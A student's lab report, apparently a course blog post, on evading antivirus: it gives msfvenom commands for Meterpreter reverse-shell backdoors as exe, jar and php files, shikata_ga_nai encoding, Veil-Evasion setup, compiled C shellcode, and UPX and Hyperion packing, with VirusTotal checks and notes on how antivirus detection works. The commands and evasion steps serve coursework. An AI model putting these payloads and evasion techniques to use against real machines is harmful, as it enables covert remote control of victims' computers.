2018-2019-2 网络对抗技术 20165308 Exp3 免杀原理与实践

2018-2019-2 网络对抗技术 20165308 Exp3 免杀原理与实践

  1. 实践内容(3.5分)
    1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)
    1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)
    (如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)
    1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5)
    2 报告内容:
    2.1.基础问题回答
    (1)杀软是如何检测出恶意代码的?
    (2)免杀是做什么?
    (3)免杀的基本方法有哪些?
    2.2.实践总结与体会
    2.3.开启杀软能绝对防止电脑中恶意代码吗?
    2.4.实践过程记录
    3.报告评分 1分
    3.1 报告整体观感 0.5分
    3.1.1 报告格式范围,版面整洁 加0.5。
    3.1.2 报告排版混乱,加0分。
    3.2 文字表述 0.5分
    3.2.1报告逻辑清楚,比较简要地介绍了自己的操作目标与过程 加0.5分。
    3.2.2报告逻辑混乱表述不清或文字有明显抄袭可能 加0分

开始实验

任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

1. 正确使用msf编码器,生成exe文件

在实验二中使用msf生成了后门程序,我们可以使用VirusTotal或Virscan这两个网站对生成的后门程序进行扫描。
用VirusTotal扫描后结果如下:

在使用Virscan网站时,如果文件名中有数字就会出现以下错误,需要改名

改名过后Virscan网站的扫描结果如下:

由此可见不加任何处理的后门程序能够被大多数杀软检测到,下面我们用msf编码器对后门程序进行一次到多次的编码,并进行检测。
一次编码使用命令:-e选择编码器,-b是payload中需要去除的字符,该命令中为了使'\x00'不出现在shellcode中,因为shellcode以'\x00'为结束符
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.1.157 LPORT=5308 -f exe > msf20165308.exe

十次编码使用命令:-i设置迭代次数
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.157 LPORT=5308 -f exe > msf5308.exe

将编码十次后的可执行文件上传到VirusTotal扫描后结果如下:

可见多次编码并不能对免杀起什么作用。

2. msfvenom生成jar文件

生成java后门程序使用命令:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.157 LPORT=5308 x> zsy_backdoor_java.jar
生成文件如下所示:

扫描结果如下:

3. msfvenom生成php文件

生成PHP后门程序使用命令:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.157 LPORT=5308 x> 5308_backdoor.php
生成文件如下所示:

扫描结果如下:

4. 使用veil-evasion生成后门程序及检测

安装veil
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
用sudo apt-get install veil-evasion命令安装Veil
之后用veil打开veil,输入y继续安装直至完成:

输入veil指令,会出现下面这个界面

用use evasion命令进入Evil-Evasion

输入命令use c/meterpreter/rev_tcp.py进入配置界面

设置反弹连接IP,命令为:set LHOST 192.168.1.157,注意此处的IP是KaliIP;
设置端口,命令为:set LPORT 5308

输入generate生成文件,接着输入你想要playload的名字:veil_c_5308

检测一下:

还是一样的会被检查出来。

5. 半手工注入Shellcode并执行

首先使用命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.157 LPORT=5308 -f c用c语言生成一段shellcode;

创建一个文件20165308.c,然后将unsigned char buf[]赋值到其中,代码如下:

使用命令:i686-w64-mingw32-g++ 20165308.c -o 20165308.exe编译这个.c文件为可执行文件;

检测结果如下图:

当想要使用windows上执行该程序时,被电脑的360卫士查杀。

6.加壳尝试一下

使用压缩壳(UPX)

给之前的20165308.exe加个壳得到zsy_upxed.exe:

还是被杀软查杀了。

用360将其加入白名单.

后面想要测试连接就可以这样了,但是这样只是让杀软不再检查这个目录而已。
因为要回连,我将zsy_upxed.exe放到了ncat文件夹,查看连接情况,可以反弹连接(这一步开始就出现问题了,问题会写在实验感想里,可怕的迈克菲!!!!)(所以用了别人的电脑进行剩下的一点实验)

加密壳Hyperion
将上一个生成的文件拷贝到/usr/share/windows-binaries/hyperion/目录中
进入目录/usr/share/windows-binaries/hyperion/中
输入命令wine hyperion.exe -v zsy_upxed.exe zsy_upxed_Hyperion.exe进行加壳:


尝试一下反弹连接

检查一下

任务二:通过组合应用各种技术实现恶意代码免杀

通过组合半手工制作shellcode,压缩壳,加密壳达到了免杀的目的
任务成功截图:

任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

这个实验由于之前说的问题 就是迈克菲那个,没有办法实现连入我的电脑。

免杀基础问题回答

1、杀软是如何检测出恶意代码的?
- 基于特征码的检测(杀软的特征库中包含了一些数据或者数据段,杀软会更新这个库,以记住更多的恶意代码,当一个可执行文件、脚本等包含这样的数据时就会被认为是恶意代码)。
- 启发式恶意软件检测(就是根据片面特征去进行检测,当某个软件或者程序想干一些看起来像是恶意软件才会去干的事情,那么他就是被定义为恶意软件,检测效果比较显著,可以检测0-day恶意软件,但通常缺乏精确判定依据,因为需要一直检测,所以开销比较大)(课上那个:当一个鸟像鸭子一样……,那它就是鸭子)。
- 基于行为的恶意软件检测(在启发式上加入了行为监控,基于动态的监控)。
2、免杀是做什么?
- 让程序无法被杀软查出来。
3、免杀的基本方法有哪些?
- 改写特征码(加壳)。
- 自己写代码刻意避开恶意代码。

实践总结与体会

本次实验,让我了解到了免杀的概念、免杀的方法(基于课上的讲解之后,更深一步的理解),熟练掌握了使用 VirusTotal、Virscan这些工具的方法,能够对后门动手实现一些免杀的处理,又复习了一遍实验二中主机之间监听、控制的操作,加深了印象,动手能力得到提升了。

问题!

因为迈克菲的原因(太强了,我关不掉他),中途出现了问题(只要后门程序点开就这样,然后自动删掉后门……)

根本没办法进行,然后我看了一下阻止记录

七次崩溃,我真的超爱他,最开始还以为是别的原因,最后发现了罪魁祸首,但我又能怎么样呢。
所以后面的实验有一些是同学电脑做的(所以有部分截图是同学的信息),还有一些自己电脑能够做出来的就用自己电脑做了。(最后VirusTotal检测zsy_upxed_Hyperion.exe的时候,那个显示没有病毒的那个,我甚至怀疑是因为迈克菲成功将中间的恶意部分去掉了,而不是我加壳成功了!)

离实战还缺些什么技术或步骤?

没有自己的想法,还是要看同学博客里的实验方向,然后跟着去做。应该学习更多的理论知识,形成自己的思路体系等,然后能自己规划出属于自己的实验方向。

posted on 2019-03-31 17:10  张士洋  阅读(182)  评论(0编辑  收藏  举报

导航